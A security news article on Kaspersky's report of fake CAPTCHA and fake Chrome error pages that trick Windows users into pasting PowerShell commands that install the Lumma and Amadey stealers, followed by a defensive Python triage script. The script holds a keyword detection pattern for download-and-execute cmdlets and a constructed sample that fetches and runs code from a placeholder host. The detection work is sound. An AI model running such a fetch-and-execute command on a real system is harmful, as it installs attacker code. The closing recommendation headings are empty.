Kaspersky has discovered a new wave of a malicious campaign that spreads through online ads and targets users of Windows computers. While browsing the web, users may click on an invisible ad that covers the entire screen and redirects them to a fake CAPTCHA page or a fake Chrome error message prompting them to follow steps to download malware. Kaspersky's telemetry captured over 140,000 incidents involving these malicious ads in September and October 2024, while over 20,000 users were redirected to misleading malicious websites. Most of the incidents involved users from Brazil, Spain, Italy and Russia. To protect themselves, experts advise users to be cautious and avoid following suspicious messages asking them to take action online.
CAPTCHA is a security feature used on websites and applications to confirm whether a user is a human or an automated program (bot). Earlier this year, there were reports of attackers distributing the Lumma malware via fake CAPTCHAs, mainly targeting gamers. When browsing gaming sites, users were directed to click on an ad that covered the entire screen. They were then redirected to a fake CAPTCHA page with misleading instructions persuading them to download the malware. When users clicked the "I am not a robot" button, a coded Windows PowerShell command was copied to their computer's clipboard. They were then prompted to paste it into the terminal and press Enter, unintentionally downloading and launching Lumma. The malware searched for cryptocurrency-related files, cookies, and password manager data on the victim's device. It also visited the websites of various e-commerce platforms, increasing their views and giving the attackers additional financial benefit.
In the new wave of attacks, Kaspersky researchers have identified another attack scenario in which, instead of a CAPTCHA, a web page error message appears, styled to look like a Chrome browser service message. The attackers instruct the user to "copy fix" to the terminal window; the "fix" is the same malicious PowerShell command described above.
Kaspersky discovered that the new wave of attacks targets not only gamers but also other user groups, and that it is distributed via file-sharing services, web applications, betting sites, adult content sites, anime communities and other channels. Attackers are also using the Amadey Trojan in this wave of attacks. Like Lumma, it steals data from popular browsers and cryptocurrency wallets, but it also takes screenshots, obtains service details for remote access and downloads a remote access tool to the victim's device, allowing attackers to gain full access to it.
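For defenders, the pasted command described above leaves a PowerShell command line that can be triaged from process-creation logs. The following Python is an added example, not Kaspersky's code; it assumes the "coded" command is passed with PowerShell's `-EncodedCommand` switch (Base64 of UTF-16LE text), and the function names and sample command lines are constructed for illustration.

```python
import base64
import re

# Real PowerShell cmdlets, aliases and .NET methods commonly used to fetch and run content.
DOWNLOAD_RUN = re.compile(
    r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloadfile|"
    r"invoke-expression|iex|start-bitstransfer)\b", re.I)
# A switch followed by a Base64-looking argument, e.g. "-enc SQBFAFgA...".
SWITCH_ARG = re.compile(r"(?:^|\s)[-/](\w+)\s+([A-Za-z0-9+/=]{8,})")


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (or an abbreviation), else None."""
    for match in SWITCH_ARG.finditer(cmdline):
        flag = match.group(1).lower()
        # powershell.exe accepts any prefix of -EncodedCommand, plus -ec.
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                raw = base64.b64decode(match.group(2), validate=True)
                return raw.decode("utf-16-le")  # payload is Base64 of UTF-16LE text
            except ValueError:  # bad Base64 or truncated UTF-16
                return None
    return None


def triage(cmdline):
    """Return the reasons a PowerShell command line deserves analyst review."""
    reasons = []
    script = decode_encoded_command(cmdline)
    if script is not None:
        reasons.append("encoded command")
    hits = sorted({h.lower() for h in DOWNLOAD_RUN.findall(script or cmdline)})
    if hits:
        reasons.append("download/execute: " + ", ".join(hits))
    return reasons


def _encode(script):
    """Build a constructed sample in the form -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (example.invalid is a placeholder host).
SAMPLES = [
    "powershell.exe -NoProfile -enc " + _encode("iwr https://example.invalid/placeholder | iex"),
    "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line) or "no findings", "<-", line[:60])
```

Decoding before matching matters here: the encoded sample contains none of the download keywords in its raw command line, so a plain string search over the log would miss it.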
To block threats related to malicious data theft software, follow the recommendations below.
Businesses:
Individual Users: